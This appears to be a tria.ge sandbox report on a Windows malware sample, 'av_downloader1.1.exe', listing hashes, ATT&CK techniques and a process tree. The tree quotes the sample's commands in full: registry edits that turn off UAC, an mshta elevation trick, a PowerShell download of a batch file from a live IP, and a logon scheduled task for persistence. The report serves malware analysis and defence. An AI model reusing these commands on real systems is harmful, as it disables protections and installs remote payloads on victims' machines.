Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
131s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
28/09/2024, 11:27
Static task
static1
Behavioral task
behavioral1
Sample
av_downloader1.1.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
av_downloader1.1.exe
Resource
win10v2004-20240802-en
General
-
Target
av_downloader1.1.exe
-
Size
88KB
-
MD5
759f5a6e3daa4972d43bd4a5edbdeb11
-
SHA1
36f2ac66b894e4a695f983f3214aace56ffbe2ba
-
SHA256
2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d
-
SHA512
f97c793e1489e09dc6867bc9fb8a8e6073e08e1019b7a6fd57efdb31099047fcef9bc7bc3a8194742d7998f075c50e5d71670711bf077da1ac801aab7d19b385
-
SSDEEP
1536:D7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIf+xB4O5:fq6+ouCpk2mpcWJ0r+QNTBf+LV
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 70 1704 powershell.exe -
pid Process 1704 powershell.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 1288 attrib.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation av_downloader1.1.exe Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation AV_DOW~1.EXE -
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
pid Process 4632 mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language av_downloader1.1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AV_DOW~1.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4556 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1704 powershell.exe 1704 powershell.exe 1704 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1704 powershell.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 2912 wrote to memory of 4400 2912 av_downloader1.1.exe 89 PID 2912 wrote to memory of 4400 2912 av_downloader1.1.exe 89 PID 4400 wrote to memory of 4632 4400 cmd.exe 92 PID 4400 wrote to memory of 4632 4400 cmd.exe 92 PID 4632 wrote to memory of 3368 4632 mshta.exe 93 PID 4632 wrote to memory of 3368 4632 mshta.exe 93 PID 4632 wrote to memory of 3368 4632 mshta.exe 93 PID 3368 wrote to memory of 4256 3368 AV_DOW~1.EXE 94 PID 3368 wrote to memory of 4256 3368 AV_DOW~1.EXE 94 PID 4256 wrote to memory of 2036 4256 cmd.exe 96 PID 4256 wrote to memory of 2036 4256 cmd.exe 96 PID 4256 wrote to memory of 4036 4256 cmd.exe 97 PID 4256 wrote to memory of 4036 4256 cmd.exe 97 PID 4256 wrote to memory of 5092 4256 cmd.exe 98 PID 4256 wrote to memory of 5092 4256 cmd.exe 98 PID 4256 wrote to memory of 2052 4256 cmd.exe 99 PID 4256 wrote to memory of 2052 4256 cmd.exe 99 PID 2052 wrote to memory of 2920 2052 cmd.exe 100 PID 2052 wrote to memory of 2920 2052 cmd.exe 100 PID 4256 wrote to memory of 220 4256 cmd.exe 101 PID 4256 wrote to memory of 220 4256 cmd.exe 101 PID 4256 wrote to memory of 1288 4256 cmd.exe 102 PID 4256 wrote to memory of 1288 4256 cmd.exe 102 PID 4256 wrote to memory of 1704 4256 cmd.exe 103 PID 4256 wrote to memory of 1704 4256 cmd.exe 103 PID 4256 wrote to memory of 4556 4256 cmd.exe 110 PID 4256 wrote to memory of 4556 4256 cmd.exe 110 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 1288 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\av_downloader1.1.exe"C:\Users\Admin\AppData\Local\Temp\av_downloader1.1.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2912 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\602C.tmp\602D.tmp\602E.bat C:\Users\Admin\AppData\Local\Temp\av_downloader1.1.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:4400 -
C:\Windows\system32\mshta.exemshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\AV_DOW~1.EXE","goto :target","","runas",1)(window.close)3⤵
- Checks computer location settings
- Access Token Manipulation: Create Process with Token
- Suspicious use of WriteProcessMemory
PID:4632 -
C:\Users\Admin\AppData\Local\Temp\AV_DOW~1.EXE"C:\Users\Admin\AppData\Local\Temp\AV_DOW~1.EXE" goto :target4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3368 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\63B6.tmp\63C7.tmp\63C8.bat C:\Users\Admin\AppData\Local\Temp\AV_DOW~1.EXE goto :target"5⤵
- Suspicious use of WriteProcessMemory
PID:4256 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F6⤵
- UAC bypass
PID:2036
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F6⤵
- UAC bypass
PID:4036
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F6⤵
- UAC bypass
PID:5092
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"6⤵
- Suspicious use of WriteProcessMemory
PID:2052 -
C:\Windows\system32\reg.exereg query HKEY_CLASSES_ROOT\http\shell\open\command7⤵PID:2920
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/6⤵PID:220
-
-
C:\Windows\system32\attrib.exeattrib +s +h d:\net6⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1288
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1704
-
-
C:\Windows\system32\schtasks.exeSchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f6⤵
- Scheduled Task/Job: Scheduled Task
PID:4556
-
-
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=4188,i,12198811467968044966,17227406646827438786,262144 --variations-seed-version --mojo-platform-channel-handle=2904 /prefetch:11⤵PID:2640
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --field-trial-handle=4192,i,12198811467968044966,17227406646827438786,262144 --variations-seed-version --mojo-platform-channel-handle=4052 /prefetch:11⤵PID:2816
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --field-trial-handle=5412,i,12198811467968044966,17227406646827438786,262144 --variations-seed-version --mojo-platform-channel-handle=5188 /prefetch:11⤵PID:872
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=5428,i,12198811467968044966,17227406646827438786,262144 --variations-seed-version --mojo-platform-channel-handle=5448 /prefetch:81⤵PID:2464
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --field-trial-handle=5568,i,12198811467968044966,17227406646827438786,262144 --variations-seed-version --mojo-platform-channel-handle=5632 /prefetch:81⤵PID:3480
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --field-trial-handle=6084,i,12198811467968044966,17227406646827438786,262144 --variations-seed-version --mojo-platform-channel-handle=6104 /prefetch:11⤵PID:3144
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --field-trial-handle=6324,i,12198811467968044966,17227406646827438786,262144 --variations-seed-version --mojo-platform-channel-handle=6352 /prefetch:81⤵PID:4424
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --field-trial-handle=6544,i,12198811467968044966,17227406646827438786,262144 --variations-seed-version --mojo-platform-channel-handle=6552 /prefetch:11⤵PID:1572
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --field-trial-handle=5768,i,12198811467968044966,17227406646827438786,262144 --variations-seed-version --mojo-platform-channel-handle=6004 /prefetch:81⤵PID:4852
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Access Token Manipulation
1Create Process with Token
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Access Token Manipulation
1Create Process with Token
1Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
1Disable or Modify Tools
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD59856d2fe29a28c54c5943c2150f7bae1
SHA1f7532a2a79b1b6aca1c151b34fe8b1ce2c798e97
SHA2560b6140b4764863f3263b0be87f35c9afe9a849823eccf37259bed08baa93e999
SHA512002db693f5664f80e58bb3590f32068f611bc97d3f71324abb659dd1fd0bffe3df36379ae92ffbeabde10bd6245b3c069b56ba4d8b4608c634a2525e7a76735f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82